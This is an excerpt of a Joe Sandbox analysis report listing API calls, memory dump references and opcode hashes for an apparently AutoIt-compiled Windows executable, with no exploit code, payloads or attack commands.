                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                            • Opcode ID: 84381834701242ed5a107eb2ca570fa3beedfa35e981ee9e6667c04d8d59f666
                                                                                                                                                                                                                                                                            • Instruction ID: 1c7c74e3123a20f590444f47eeab44912a32613381fc54d7b600acd7532a7b28
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84381834701242ed5a107eb2ca570fa3beedfa35e981ee9e6667c04d8d59f666
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE619074204242AFD321DF15C495F29BBE1AF94318F14C49CE46A8B7A3C772ED49CB92

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1062 bf35b3-bf3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF35E1
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3602
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF3616
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF361F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                            • Opcode ID: bececec0de2a8b6118d75bc2b504ffe309f1ce0ad6d67137ba90dc3d2879b88b
                                                                                                                                                                                                                                                                            • Instruction ID: faf5c7bc521fd021aa375259b41767ed205780dec7efdf88bca97b3abf7a9adc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bececec0de2a8b6118d75bc2b504ffe309f1ce0ad6d67137ba90dc3d2879b88b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73F017706002D47AEB211713AC08F7B2FBDE7C6F10B18002EF905A61B0C6694841EBB4

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C35287
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF6299
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                            • Opcode ID: 5540c1ee9b1806ada174fe1b010694240d945b70c72653d2a37bd28c97054665
                                                                                                                                                                                                                                                                            • Instruction ID: affa1cb29180d54cce49ef74ab9e0e9756c73248d461c3410d624cc7bbdea52b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5540c1ee9b1806ada174fe1b010694240d945b70c72653d2a37bd28c97054665
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6416D71408208AAC711EB60DC45FEF77ECAF55320F04466AFA99930A2EB749649C796
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BF58BE,SwapMouseButtons,00000004,?), ref: 00BF58EF
                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BF58BE,SwapMouseButtons,00000004,?), ref: 00BF5910
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00BF58BE,SwapMouseButtons,00000004,?), ref: 00BF5932
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                            • Opcode ID: 537f20438ad3907656fe4cad19fe3dca3e40f12d41af1caee43e2199982e94a1
                                                                                                                                                                                                                                                                            • Instruction ID: 7172d9b23733764edfcb57509a614e721f66284a8602432ffab648d58e83ebb1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 537f20438ad3907656fe4cad19fe3dca3e40f12d41af1caee43e2199982e94a1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7511487551061CFEDB258F64C880ABE77A8EF40760B108499EA02E7210E271AE459764
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Variable must be of type 'Object'., xrefs: 00C448C6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                            • API String ID: 0-109567571
                                                                                                                                                                                                                                                                            • Opcode ID: d33c9ad712fdff2e423d5428bc527306a8ef19e5865a45708822c026699af2c4
                                                                                                                                                                                                                                                                            • Instruction ID: 2521cd78dc3f0a43c46992fc96cd24c29d1341eebbfdb27c62219bbf67e2f875
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d33c9ad712fdff2e423d5428bc527306a8ef19e5865a45708822c026699af2c4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89C27C75A0020ADFCB24DF98D880BBDB7F1FF09310F2481A9EA15AB291D775AD85DB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C015F2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1056ad2d7784573e8b4328ba407bdc9887dc7769326c622c06e894eaba29f141
                                                                                                                                                                                                                                                                            • Instruction ID: d1b1f1c88ec802c184722e52eefa30d05adee930997209156f8677c09301ae57
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1056ad2d7784573e8b4328ba407bdc9887dc7769326c622c06e894eaba29f141
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93B28D74A08340CFCB24CF19C480B2AB7E1BF99700F29895DE9958B392D771EE85DB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C109D8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C13614: RaiseException.KERNEL32(?,?,?,00C109FA,?,00000000,?,?,?,?,?,?,00C109FA,00000000,00CB9758,00000000), ref: 00C13674
                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C109F5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                            • Opcode ID: 62ff42115d759bdb972f5ea4ecf09498bcd546a5ed0fe12c98bd49ddd5976045
                                                                                                                                                                                                                                                                            • Instruction ID: 0e4f36345357b31b6faef47d9ead1270e28ada947604efed8d18aaae292558c4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62ff42115d759bdb972f5ea4ecf09498bcd546a5ed0fe12c98bd49ddd5976045
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF0C23490020CB78F00BAA5EC568DE776C9E03354FB04120B924A6592FBB0EBD6F6D0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C78D52
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00C78D59
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C78F3A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                            • Opcode ID: ae398e2a0e39109d7643fbba2d0940e324dc50e930de96cc336321650c75297d
                                                                                                                                                                                                                                                                            • Instruction ID: 2fb5d01f61e8bc01afd9798103d54a26d977eed96622ca2470aca35edf4b1114
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae398e2a0e39109d7643fbba2d0940e324dc50e930de96cc336321650c75297d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8127D71A083419FC714DF24C484B6ABBE5FF88324F14895DE9998B392CB31ED49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 306214811-0
                                                                                                                                                                                                                                                                            • Opcode ID: 801c485e0cf30e58027410b6e65f343482b5c0daf55732ff9d0580cd9032012f
                                                                                                                                                                                                                                                                            • Instruction ID: 0e746785c68f9c216a2e050f0a6bec624eb57571be94f83e717db5b0dc93d5f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 801c485e0cf30e58027410b6e65f343482b5c0daf55732ff9d0580cd9032012f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69A16B31604505EFCB28DF18D5D19A9BBE1FF56314B60C4ADE81A8F292DB31ED86DB80
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF32AF
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF32B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF32C2
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF32CD
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF32D5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF32DD
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3205: RegisterWindowMessageW.USER32(00000004,?,00BF2964), ref: 00BF325D
                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BF2A0A
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32 ref: 00BF2A28
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00C33A0D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                            • Opcode ID: c41dd59217b3ebbb566c20c72e761547d14f4fc2321e43cc8436e26a0543a708
                                                                                                                                                                                                                                                                            • Instruction ID: 769c1b3ad2375c9bcb25c92c459c50da821c43f0ce4dcda351275e8667dcc460
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c41dd59217b3ebbb566c20c72e761547d14f4fc2321e43cc8436e26a0543a708
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A47178B19113048F8B88EF69ED69F2E7BE1FB4830575041AEE109C73A1EBB045469F58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF6299
                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00C0FD36
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C0FD45
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C4FE33
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2f9197ef17771d28f1d059ab8a45dde32c853c535071459fcecc16ba6bebce54
                                                                                                                                                                                                                                                                            • Instruction ID: 7fc72b26f558f58dd2f9244f6e66c0ce5ead84e025cced448336d79f1cda9b0a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f9197ef17771d28f1d059ab8a45dde32c853c535071459fcecc16ba6bebce54
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED31A971904754AFDB32CF24C855BEBBBECAF02304F04049ED5DA97142C3745A86CB51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,00C2894C,?,00CB9CE8,0000000C), ref: 00C28A84
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C2894C,?,00CB9CE8,0000000C), ref: 00C28A8E
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C28AB9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                            • Opcode ID: 479098fbe13bdf5decfc09ad931e30a319deeff1f03cf4b6e721c96deed292c8
                                                                                                                                                                                                                                                                            • Instruction ID: c9265e168c413a1f8fe0f4dda6a37037f0d972c6b14b63f2d8bdd4528363e979
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 479098fbe13bdf5decfc09ad931e30a319deeff1f03cf4b6e721c96deed292c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4014932617670AADA246274BC46B7F67494F82B34F29021EF8248B9D3DF708EC57290
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C297BA,FF8BC369,00000000,00000002,00000000), ref: 00C29744
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C297BA,FF8BC369,00000000,00000002,00000000,?,00C25ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C16F41), ref: 00C2974E
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C29755
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                            • Opcode ID: 199e4be606582d4599a5183afe39e34532f264106fcb4bb9c27f17783ef03648
                                                                                                                                                                                                                                                                            • Instruction ID: 536b3def072108d20f28ca405f8ceca88bedbbea3d905568581c1766c5a03915
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 199e4be606582d4599a5183afe39e34532f264106fcb4bb9c27f17783ef03648
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A01F032630524ABCB159F99FC05DAE7729DF85730F240259F811971D0E671DD919790
